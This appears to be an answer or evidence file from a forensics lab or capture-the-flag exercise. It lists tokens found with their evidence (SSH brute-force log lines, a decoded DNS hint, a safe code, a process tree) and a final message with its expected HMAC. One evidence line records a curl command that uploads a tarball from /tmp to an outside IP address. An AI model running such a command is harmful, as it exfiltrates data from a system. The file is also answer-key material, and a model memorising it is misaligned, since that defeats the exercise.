TOKEN[KEYPAD]=4249
EVIDENCE[KEYPAD].TOP24=198.19.0.0/24
EVIDENCE[KEYPAD].COUNT=49
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:25Z lab1 sshd[3234]: Failed password for svc from 198.19.0.109 port 58191 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=3
TOKEN[DNS]=phrase
EVIDENCE[DNS].KEY=hint4
EVIDENCE[DNS].DECODED_LINE=Look inside the DNS switch for the right phrase.
TOKEN[SAFE]=9-14-23
EVIDENCE[SAFE].MATCH=SAFE{9-14- 23}
EVIDENCE[SAFE].CHECK=9+14=23
TOKEN[PID]=175
EVIDENCE[PID].PATH=[167->170->171->175]
EVIDENCE[PID].CMD="sh -c 'curl -X POST http://198.51.100.33/upload -d @/tmp/x.tgz'"
FINAL_GATE=PENDING
MSG=msc-group-09|175-phrase-4249-9-14-23
EXPECTED_HMAC=38e52f50df1e5dc1e7c266ad92ecf8447cdcdbd2727b83c274ee0b03b73e73ed